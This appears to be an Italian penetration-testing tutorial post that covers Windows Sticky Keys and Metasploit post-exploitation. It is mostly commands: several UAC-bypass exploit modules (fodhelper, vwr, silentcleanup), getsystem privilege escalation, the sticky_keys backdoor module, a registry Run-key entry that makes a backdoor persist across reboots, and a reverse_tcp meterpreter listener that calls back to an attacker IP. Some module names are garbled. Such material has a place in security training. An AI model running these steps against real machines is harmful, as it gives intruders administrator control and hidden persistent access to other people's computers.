tags: bypass_UAC phishing Sticky_Keys metasploit


I tasti permanenti (Sticky Keys) sono una funzionalità di accessibilità di Windows che fa sì che i tasti modificatori rimangano attivi, anche dopo essere stati rilasciati. I tasti permanenti aiutano gli utenti che hanno difficoltà a premere combinazioni di tasti di scelta rapida. Possono essere abilitati premendo il tasto Maiusc per 5 volte. I tasti permanenti possono anche essere utilizzati per ottenere un accesso privilegiato non autenticato alla macchina.

Exploit bypassuac_fodhelper

Puoi utilizzare l’exploit use exploit/windows/local/bypassuac_fodhelper, si presuppone che tu abbia già accesso alla macchina quindi avendo una sessione in background puoi caricare questo payload tramite il comando set session 1:

set LHOST <indirizzo IP attaccante>

set TARGET 0 Serve ad indicare ce l’obbiettivo è lo stesso della sessione.

Digita getsystem -t 1 per elevare i privilegi.

Bypassuac_vwr

use exploit/windows/local/bypassuac_ vwr

Exploit sticky_keys

 
use post/windows/manage/sticky_keys
 
sessions -i*
 

Exploit bypassuac_silentcleanup

 
use exploit/windows/local/bypassuac_silentcleanup
 
set session 1
 

 
set LHOST <indirizzo IP attaccante>
 
set TARGET 0
 
exploit
 
getsystem -t 1
 

Backdoor

Per creare una backdoor che si attiva ogni volta che il computer viene riavviato possiamo seguire i seguenti passaggi a partire da una sessione meterpreter con privilegi di amministratore:

 
shell
 
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v backdoor /t REG_EXPAND_SZ /d "C:\Users\Admin\Downloads\registry.exe"
 

Ora per accedere a questa backdoor possiamo utilizzare sempre metasploit tramite il multi handler

 
use exploit/multi/handler
 
set payload windows/meterpreter/reverse_tcp
 
set lhost <indirizzo IP attaccante>
 
set lport 4444